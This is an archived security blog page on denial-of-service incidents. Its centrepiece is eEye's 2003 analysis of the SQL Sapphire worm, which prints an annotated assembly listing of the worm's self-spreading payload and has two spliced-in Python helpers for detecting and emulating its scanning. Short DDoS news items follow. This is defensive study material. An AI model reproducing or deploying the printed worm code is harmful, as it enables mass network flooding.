This is an archived project. See http://blogs.23.nu/disLEXia/stories/492/ for details and further pointers.

disLEXia

DoS

Monday, 27. January 2003

SQL Sapphire Worm Analysis

Forwarded from: "Marc Maiffret" <marc@eeye.com>

SQL Sapphire Worm Analysis

Release Date:
1/25/03

Severity:
High

Systems Affected:
Microsoft SQL Server 2000 pre SP 2

Description:
Late Friday, January 24, 2003 we became aware of a new SQL worm
spreading quickly across various networks around the world.

The worm is spreading using a buffer overflow to exploit a flaw in
Microsoft SQL Server 2000. The SQL 2000 server flaw was discovered in
July, 2002 by Next Generation Security Software Ltd. The buffer
overflow exists because of the way SQL improperly handles data sent to
its Microsoft SQL Monitor port. Attackers leveraging this
vulnerability will be executing their code as SYSTEM, since Microsoft
SQL Server 2000 runs with SYSTEM privileges.

The worm works by generating pseudo-random IP addresses to try to
infect with its payload. The worm payload does not contain any
additional malicious content (in the form of backdoors etc.); however,
because of the nature of the worm and the speed at which it attempts
to re-infect systems, it can potentially create a denial-of-service
attack against infected networks.

We have been able to verify that multiple points of connectivity on
the Internet have been bogged down since 9pm Pacific Standard Time.

It should be noted that this worm is not the same as an earlier SQL
worm that used the SA/nopassword SQL vulnerability as its spread
vector. This new worm is more devastating, as it is taking
advantage of a software-specific flaw rather than a configuration
error. We have already had many reports of smaller networks brought
down due to the flood of data from the Sapphire Worm trying to
re-infect new systems.

Corrective Action

We recommend that people immediately firewall SQL service ports at all
of their gateways. The worm uses only UDP port 1434 (SQL Monitor Port)
to spread itself to a new system; however, it is safe practice to
filter all SQL traffic at all gateways. The following is a list of
SQL server ports:

ms-sql-s 1433/tcp #Microsoft-SQL-Server
ms-sql-s 1433/udp #Microsoft-SQL-Server
ms-sql-m 1434/tcp #Microsoft-SQL-Monitor
ms-sql-m 1434/udp #Microsoft-SQL-Monitor
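The advisory's two operational points are that the worm spreads only over UDP/1434 and that a single infected host sprays that traffic at a large number of pseudo-random destinations fast enough to flood its own network. The following is an added example, not part of the eEye advisory, of a simple behavioural check a network defender could run over flow records: it ignores everything except UDP datagrams to port 1434 and reports sources that reach an unusually large number of distinct destinations within a short window. The Flow type, the function names and the flow records are all constructed for this example; thresholds are assumptions to tune per network.

```python
from collections import defaultdict
from dataclasses import dataclass

SQL_MONITOR_PORT = 1434  # ms-sql-m, the only port the worm uses to spread


@dataclass(frozen=True)
class Flow:
    """One observed datagram/segment, as a flow exporter or sniffer would report it."""
    ts: float      # seconds since capture start
    src: str
    dst: str
    proto: str     # "udp" or "tcp"
    dport: int


def find_fanout_sources(flows, window_s=1.0, min_dsts=20):
    """Return {src: peak_distinct_dsts} for sources that send UDP/1434 to at
    least min_dsts distinct destinations inside any window_s-second window.

    A normal SQL Server Resolution Service client talks to a handful of
    servers; a Sapphire-style spreader talks to hundreds per second.
    """
    by_src = defaultdict(list)
    for f in flows:
        if f.proto == "udp" and f.dport == SQL_MONITOR_PORT:
            by_src[f.src].append(f)

    alerts = {}
    for src, fs in by_src.items():
        fs.sort(key=lambda f: f.ts)
        in_window = defaultdict(int)   # dst -> packets currently inside the window
        left = 0
        for right in range(len(fs)):
            in_window[fs[right].dst] += 1
            # slide the left edge forward until the window is at most window_s wide
            while fs[right].ts - fs[left].ts > window_s:
                in_window[fs[left].dst] -= 1
                if in_window[fs[left].dst] == 0:
                    del in_window[fs[left].dst]
                left += 1
            if len(in_window) >= min_dsts:
                alerts[src] = max(alerts.get(src, 0), len(in_window))
    return alerts


def build_sample_flows():
    """Constructed sample traffic: one legitimate client and one spreading host."""
    flows = []
    # Legitimate client: five resolution requests to a single server over 10 s.
    for i in range(5):
        flows.append(Flow(ts=2.0 * i, src="10.0.0.9", dst="10.0.0.20",
                          proto="udp", dport=SQL_MONITOR_PORT))
    # Ordinary TCP/1433 query traffic, which the check deliberately ignores.
    flows.append(Flow(ts=3.0, src="10.0.0.9", dst="10.0.0.20", proto="tcp", dport=1433))
    # Infected host: 50 distinct destinations within half a second.
    for i in range(50):
        flows.append(Flow(ts=5.0 + i * 0.01, src="10.0.0.5", dst=f"198.51.100.{i + 1}",
                          proto="udp", dport=SQL_MONITOR_PORT))
    return flows


if __name__ == "__main__":
    for src, peak in find_fanout_sources(build_sample_flows()).items():
        print(f"{src}: {peak} distinct UDP/1434 destinations in one window")
```

The check is deliberately content-agnostic: it keys on the fan-out behaviour the advisory describes rather than on bytes of the payload, so it also catches the self-inflicted flood the advisory warns about even when the gateway filter for UDP/1434 is already in place and the datagrams never leave the site.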

Once again this worm is taking advantage of a known vulnerability that
has had a patch available for many months. Microsoft has also released
a recent service pack for SQL (Service Pack 3) that includes a fix for
this vulnerability.

Standalone patch:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS02-039.asp

SQL 2000 Service Pack 3:
http://www.microsoft.com/sql/downloads/2000/sp3.asp

Previous SQL Service Pack versions are vulnerable.

Technical Description

The following is a quick run-down of what the worm's payload is doing after
infection:

1. Retrieves the address of GetProcAddress and LoadLibrary from the
IAT in sqlsort.dll. It snags the necessary library base addresses and
function entry points as needed.
2. Calls GetTickCount, and uses the returned count as a pseudo-random seed.
3. Creates a UDP socket.
4. Performs a simple pseudo-random number generation formula using the
returned GetTickCount value to generate an IP address that will later
be used as the target.
5. Sends the worm payload in a SQL Server Resolution Service request to the
pseudo-random target address, on port 1434 (UDP).
6. Returns to the formula and continues generating new pseudo-random
addresses.


push 42B0C9DCh ; [RET] sqlsort.dll -> jmp esp
mov eax, 1010101h ; Reconstruct session: after the overflow the payload
                  ; buffer gets corrupted during program execution but
                  ; before the payload is executed.
xor ecx, ecx
mov cl, 18h

FIXUP:
push eax
loop FIXUP
xor eax, 5010101h
push eax
mov ebp, esp
push ecx
push 6C6C642Eh
push 32336C65h
push 6E72656Bh ; kernel32
push ecx
push 746E756Fh ; GetTickCount
push 436B6369h
push 54746547h
mov cx, 6C6Ch
push ecx
push 642E3233h ; ws2_32.dll
push 5F327377h
mov cx, 7465h
push ecx
push 6B636F73h ; socket
mov cx, 6F74h
push ecx
push 646E6573h ; sendto
mov esi, 42AE1018h ; IAT from sqlsort
lea eax, [ebp-2Ch] ; (ws2_32.dll)
push eax
call dword ptr [esi] ; call loadlibrary
push eax
lea eax, [ebp-20h]
push eax
lea eax, [ebp-10h] ; (kernel32.dll)
push eax
call dword ptr [esi] ; loadlibrary
push eax
mov esi, 42AE1010h ; IAT from sqlsort
mov ebx, [esi]
mov eax, [ebx]
cmp eax, 51EC8B55h ; check entry point fingerprint
jz short VALID_GP ; Check entry point fingerprint for GetProcAddress; if it
                  ; fails, fall back to the GetProcAddress entry in another
                  ; DLL version. Undetermined what DLL versions this will
                  ; succeed on. Due to the lack of reliable importing this
                  ; may not work across all DLL versions.
mov esi, 42AE101Ch ; IAT entry -> 77EA094C

VALID_GP:
call dword ptr [esi] ; GetProcAddress
call eax ; return from GetProcAddress = GetTickCount entrypoint
xor ecx, ecx
push ecx
push ecx
push eax
xor ecx, 9B040103h
xor ecx, 1010101h
push ecx ; 9A050002 = port 1434 / AF_INET
lea eax, [ebp-34h] ; (socket)
push eax
mov eax, [ebp-40h] ; ws2_32 base address
push eax
call dword ptr [esi] ; GetProcAddress
push 11h
push 2
push 2
call eax ; socket
push eax
lea eax, [ebp-3Ch] ; sendto
push eax
mov eax, [ebp-40h] ; ws2_32 base address
push eax
call dword ptr [esi] ; GetProcAddress
mov esi, eax ; save sendto -> esi
or ebx, ebx
xor ebx, 0FFD9613Ch

PRND:
mov eax, [ebp-4Ch] ; Pseudo Random Algorithm Start
lea ecx, [eax+eax*2]
lea edx, [eax+ecx*4]
shl edx, 4
add edx, eax
shl edx, 8
sub edx, eax
lea eax, [eax+edx*4]
add eax, ebx ; Pseudo Random Algorithm End
mov [ebp-4Ch], eax
push 10h
lea eax, [ebp-50h]
push eax
xor ecx, ecx
push ecx
xor cx, 178h
push ecx
lea eax, [ebp+3]
push eax
mov eax, [ebp-54h]
push eax
call esi ; sendto
jmp short PRND ; Jump back to Pseudo Random Algorithm Start
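The PRND block above is the part of the listing an analyst most wants to pin down, because it decides where each infected host sends its datagrams. The following is an added analysis helper, not code from the advisory or from eEye: it mirrors the lea/shl/add/sub chain instruction by instruction, checks that the chain is exactly a multiplication by 214013 followed by the add of ebx (a multiply-and-add linear congruential step), and maps the resulting register value to the dotted-quad address that "mov [ebp-4Ch], eax" writes into the sockaddr's sin_addr field. Per the listing, the seed is the GetTickCount return value and the increment ebx is the GetProcAddress IAT value XORed with 0FFD9613Ch, so the increment depends on the DLL build in use; both are parameters here. Function names are this example's own.

```python
MASK32 = 0xFFFFFFFF


def prnd_step_as_listed(x: int, increment: int) -> int:
    """Emulate the PRND block register by register (all arithmetic mod 2**32)."""
    eax = x & MASK32                         # mov eax, [ebp-4Ch]
    ecx = (eax + eax * 2) & MASK32           # lea ecx, [eax+eax*2]   -> 3x
    edx = (eax + ecx * 4) & MASK32           # lea edx, [eax+ecx*4]   -> 13x
    edx = (edx << 4) & MASK32                # shl edx, 4             -> 208x
    edx = (edx + eax) & MASK32               # add edx, eax           -> 209x
    edx = (edx << 8) & MASK32                # shl edx, 8             -> 53504x
    edx = (edx - eax) & MASK32               # sub edx, eax           -> 53503x
    eax = (eax + edx * 4) & MASK32           # lea eax, [eax+edx*4]   -> 214013x
    return (eax + increment) & MASK32        # add eax, ebx


def prnd_step_closed_form(x: int, increment: int) -> int:
    """The same step written as the LCG it is: x' = 214013*x + increment (mod 2**32)."""
    return (214013 * x + increment) & MASK32


def as_dotted_quad(value: int) -> str:
    """The 32-bit register is stored to sin_addr as-is (little-endian), so the
    low byte of eax becomes the first octet of the address on the wire."""
    return ".".join(str(b) for b in (value & MASK32).to_bytes(4, "little"))


def scan_spread(seed: int, increment: int, steps: int) -> int:
    """How many distinct first octets (/8 networks) the generator touches in
    `steps` iterations: a rough measure of how widely one host sprays traffic."""
    x = seed & MASK32
    first_octets = set()
    for _ in range(steps):
        x = prnd_step_as_listed(x, increment)
        first_octets.add(x & 0xFF)
    return len(first_octets)


if __name__ == "__main__":
    # Constructed seed/increment values, chosen only to exercise the helpers.
    seed, inc = 0x00BC614E, 0x77EA094C ^ 0xFFD9613C
    x = prnd_step_as_listed(seed, inc)
    assert x == prnd_step_closed_form(seed, inc)
    print("next value", hex(x), "->", as_dotted_quad(x))
    print("distinct /8s in 1000 steps:", scan_spread(seed, inc, 1000))
```

Two things the emulation makes visible that the raw listing does not: the value generated is used directly as an IPv4 address without any exclusion of unroutable ranges, and the increment is not a fixed constant but a value derived from a code address, which is why the sequence differs between affected DLL builds.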

In Closing
We have provided brief information here as we are currently working to
understand more of the worm's internal behavior. We will provide
updates as they become available.

This worm has been dubbed the "Sapphire Worm" by eEye due to the fact
that several engineers had to be pulled away from local bars to begin
the investigation/dissection process.

Credit:
Riley Hassell

Related Links:
SQLSecurity.com
http://sqlsecurity.com/

Microsoft Security Bulletin:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms02-039.asp

Copyright (c) 1998-2003 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express
consent of eEye. If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please e-mail
alert@eEye.com for permission.

Disclaimer
The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information. In no event
shall the author be liable for any damages whatsoever arising out of
or in connection with the use or spread of this information. Any use
of this information is at the user's own risk.

Feedback
Please send suggestions, updates, and comments to:

eEye Digital Security
http://www.eEye.com
info@eEye.com [isn]
09:03



Could Attack on DALnet Spell End for IRC?

For at least a month, distributed denial of service, or DDOS, attacks have been crippling DALnet, one of the world's largest Internet Relay Chat networks, bringing it to its knees and raising the possibility that many hosting providers may refuse to host IRC servers at all. [LinuxSecurity.com]
09:01



Thursday, 05. December 2002

I shut radio site, boasts teen hacker

By CHRIS BARTON

A teenage hacker attacked an online chatroom run by The Edge radio station and then turned his attention to TV3's website.

The 15-year-old, who goes by the online name of "deejay-fuzion" and attends Rotorua Lakes High School, rang the Herald to brag about his exploits.

Asked why he launched a "DDOS" (distributed denial of service) attack against the chatroom on Monday night, he said: "Because the administrator was ... just being a smart arse."

"Dj-fu" signalled his "bots" to flood the chatroom computer with spurious internet traffic, causing the server to slow down and eventually stop.

During the process he noticed other servers belonging to TV3 were in the same proximity so he tried his attack on TV3's website - "just because I could". (Radioworks, which owns the Edge, and TV3 have the parent company CanWest).

TV3 communications manager Roger Beaumont confirmed The Edge chat server had a DDOS attack and was offline for a short period. But he said it was coincidence that TV3's website was offline on Tuesday for routine maintenance.

Will Steele, a friend of the 15-year-old who was online at the time, said the TV3 site was unavailable during the attack and the "routine maintenance" message appeared on the site after the attack ended at 9.45pm. That was when the hacker was taken offline by his internet provider, Quicksilver.

Its network manager Mark Frater said two individuals were disconnected on Monday night after the internet provider received a complaint from a server administrator.

When contacted by Quicksilver, both denied knowledge of an attack and had their internet accounts reinstated.

Quicksilver manager Trevor Isted said there was no proof to link the pair to the attack. Usage logs were being investigated, and if evidence was found, the pair would be banned from access for breaching the internet provider's acceptable use policy.

The teenager claims to have written a trojan program called "FB3" with a friend known online as "lynx".

The program exploits a "Netbios" vulnerability in Windows PCs related to file and print sharing, to plant itself on unsuspecting users' computers.

The infected computers (bots - short for robots) signal their presence to a computer in the United States which the teenager uses to send out the instructions to attack.

In this case the method of attack was a "SYN flood" - an efficient process which fakes the initial handshake of an internet connection with false addresses which the target machine is unable to answer.

It keeps retrying to accept them, and with enough of these happening, a server can become overwhelmed.

New anti-hacking provisions - including clauses covering DDOS attacks - in the Crimes Amendment Bill are waiting to be introduced to Parliament.

But the hacker would be immune from prosecution because he is only 15. [moreover Computersecurity]
18:44



Wednesday, 04. December 2002

An Introduction to Distributed Denial of Service Attacks

This article will explain the concept of DDoS attacks, how they work, how to react if you become a target, and how the security community can work together to prevent them. [Help Net Security]
12:38



Friday, 22. November 2002

Brief: T-Mobile installs GPRS network firewall

In a move to head off hacker probes detected earlier this month on its GPRS cellular network, T-Mobile USA Inc. has installed a firewall. [Computerworld]
05:23



Tuesday, 19. November 2002

Glitch Opens T-Mobile User to Hacker Probes

An IT manager at the Associated Press found hacker probes on a PC tied to T-Mobile USA's mobile data network, raising concerns about whether he might be charged for the unwanted traffic. [Computerworld]
06:53



Monday, 04. November 2002

SpamCop Blacklists Declan, Again

Declan McCullagh reports that his Politech server has been blacklisted by SpamCop -- for the third time. Longtime readers may... [Freedom To Tinker]
16:14



Wednesday, 23. October 2002

Hacker attack targets root servers

A powerful denial-of-service attack briefly crippled nine of the 13 Internet "root" servers, but traffic routing was able to continue unimpeded, said ICANN VP Louis Touton: "As best we can tell, no user noticed and the attack was dealt with and life goes on." One government official described Monday's attack as the most sophisticated and large-scale assault on these root servers to date. The attack, which began around 4:45 p.m. EDT on Monday, blasted the servers with 30 to 40 times the normal amount of messages, rendering seven computers unable to respond to legitimate Internet traffic. Two others failed intermittently during the attack. The Internet theoretically can run with just one operational root server, but response times would be very slow. [AP 23 Oct 2002; NewsScan Daily, 23 October 2002] http://apnews.excite.com/article/20021023/D7MR8PT00.html [ via risks-digest Volume 22, Issue 32]
00:00



Friday, 11. October 2002

Scottish ISP in repeat DDoS attack

Edinburgh-based ISP edNET was hit by a distributed denial of service attack, again.

The attack started yesterday morning, and continued throughout the day, continuing until late afternoon today. Residual problems still remain. EdNET's customer status page said that the attack was minor but customers tell us that they have lost service because of the attack. [...] One user writes to tell us that the problem is causing more problems than this message would imply.

"To the best of my knowledge both business and home users have had no Internet access for the best part of 36 hours," he writes.

[...] This
08:38



Wednesday, 23. January 2002

Royal chat session failed

A public chat session was scheduled yesterday between, on one hand, the Dutch Crown Prince Willem Alexander and his fiancee Maxima Zorreguieta and, on the other hand 100 selected citizens. The session was made available for everybody to watch on a Web site.

The server failed after a few minutes and did not come up again, so the rest of the session was canceled.

According to several news sources (radio and TV news, printed press), KPN, who provided the server, says that the crash was caused by "sabotage", and that the site, that was designed for "tens of thousands" of users, received 3 billion (Yes, 3,000,000,000) hits.

The story does not look very plausible to me. To deliver 3,000,000,000 IP packets, even short ones, in a few minutes takes something like a 10 Gbits/sec connection into the server, and would require quite a powerful attacking machine with a comparable network connection, or a concerted attack by tens of thousands of home PC's on modem lines.

I also had a look at http://internettrafficreport.com Such a volume of traffic in a short time should cause some slowdown of other Internet traffic in the networks concerned. I saw no noticeable performance degradation in any of the Dutch routers monitored by this site, nor anywhere else, around the time of the event.

Speculation in the media now goes that the site simply received more genuine hits than it was designed for, but not billions (Holland has 16 million inhabitants), and could not cope, and that KPN is reluctant to admit their mis-estimation of the traffic.

Does anybody have more information about what really happened? [Erling Kristiansen <ekristia@xs4all.nl> via risks-digest Volume 21, Issue 89]
00:00



Friday, 07. December 2001

SMS phone crash exploit a risk for older Nokias

SMS phone crash exploit a risk for older Nokias, by John Leyden, 12 Jun 2001

Nokia has upgraded its phone software to guard against a security glitch that might allow a cracker to render a phone inoperable by sending a text message. However, older phones may still be vulnerable.

http://www.theregister.co.uk/content/55/23232.html ["monty solomon" <monty@roscom.com> via risks-digest Volume 21, Issue 82]
00:00



Thursday, 29. November 2001

How to crash a phone by SMS

How to crash a phone by SMS By John Leyden Posted: 28/11/2001 at 18:20 GMT

So now you can send an SMS and crash a mobile phone, so that the user is locked out. Job de Haas, a security researcher at ITSX, has adapted a program called sms_client, which sends an SMS message from an Internet-connected PC, in which the User Data Header is broken.

During a presentation during the Black Hat conference last week, he demonstrated how a malformed message crashes a Nokia 6210 phone on its receipt. Once the message is received it is impossible to turn on an infected phone again. ...

http://www.theregister.co.uk/content/55/23080.html [Monty Solomon <monty@roscom.com> via risks-digest Volume 21, Issue 80]
00:00



Thursday, 24. May 2001

CERT subjected to "just another attack"

The Web site of the federally funded Computer Emergency Response Team (CERT) was clogged by a "denial of service" attack that lasted 30 hours this week. CERT, which is located at Carnegie Mellon University in Pittsburgh, has a mission of providing warnings about computer attacks and viruses. An official of the organization said: "We get attacked every day. This is just another attack. The lesson to be learned here is that no one is immune to these kinds of attacks. They cause operational problems, and it takes time to deal with them." [AP/*USA Today*, 24 May 2001; NewsScan Daily, 24 May 2001 http://www.usatoday.com/life/cyber/tech/2001-05-24-cert-hacked.htm] ["NewsScan" <newsscan@newsscan.com> via risks-digest Volume 21, Issue 42]
00:00



Thursday, 29. March 2001

Approved posts to large listservs

I recently sent an email to bugtraq@securityfocus.com, which was approved after being examined by the moderator.

Here is the risk: Since I made the mistake of using an e-mail address from a small domain that I manage, my DNS server immediately got killed by the tens of thousands of mail servers trying to resolve my domain name. (Which of course was not in anyone's cache; my domain is pretty much unknown.)

I saw all this traffic and didn't immediately recognize what it was. I was scared, but a little bit of investigation provided an answer.

After an hour and my cable modem rebooting a few times from the sheer load, everything seemed to settle down, but I'll tell you, watching the lights on that modem flash without yet understanding what was happening sure scared me. [Paul Hessels <timdau@yahoo.com> via risks-digest Volume 21, Issue 32]
00:00



Friday, 26. January 2001

Network vandal attacks Microsoft sites

Just a day after Microsoft's Web sites were down for an extended period of time because of the "human error" of a technician, they were victimized by the "human malice" of a network vandal who subjected them to a "denial of service" attack that flooded them with bogus communications, causing them to gridlock and reject legitimate communications from their customers. The company has called in the FBI for assistance. Computer security expert Abe Singer of the San Diego Supercomputer Center said that part of Microsoft's vulnerability to attack was due to the fact that its four domain-name servers are linked in a single network. "They had all their eggs in one basket and basically someone knocked down the basket." (*The Washington Post*, 26 Jan 2001; NewsScan Daily, 26 Jan 2001 http://washingtonpost.com/wp-dyn/articles/A47581-2001Jan25.html) ["NewsScan" <newsscan@newsscan.com> via risks-digest Volume 21, Issue 22]
00:00



Wednesday, 03. January 2001

Evil spammers jailed for two years

By: John Leyden

Two Los Angeles men are to go to jail for their part in a bulk email scam which duped 12,000 people and severely impacted upon the operations of several large US ISPs.

Associated Press reports that Steve Shklovskiy and Yan Shtok both received a sentence of two years and were ordered to pay £69 000 compensation for their role in a September 1999 scheme which involved the sending of 50 million emails. The men pleaded guilty to fraud charges in December 1999, so why it has taken so long for a sentence to be pronounced remains unclear. Two others also involved in the scam were sentenced to probation in July.

The spam messages sent out by the gang invited recipients to send a £24 "processing fee" in order to learn how to get a job stuffing envelopes. We're surprised 12,000 people replied to such an obvious scam - particularly when such jobs are advertised in most every evening newspaper's situation vacant column.

Investigators said Shklovskiy and Shtok worked out a way to use commercially available software to "harvest" email addresses. Under the terms of the plea agreement the men made with the court, which presumably took a year to conclude, they will have to explain the techniques they used to perform the scam.

Internet providers, including AOL, AT&T and Mindspring, were besieged by customer complaints and their systems were threatened by the overload as a result of the sheer scale of the spamming. They also suffered the further indignity of being bombarded with customer complaints [The Register]
00:00



disLEXia, a research project by Maximillian Dornseif


This is category DoS of the disLEXia project. It is also available in machine-readable format, e.g. to use with news aggregators: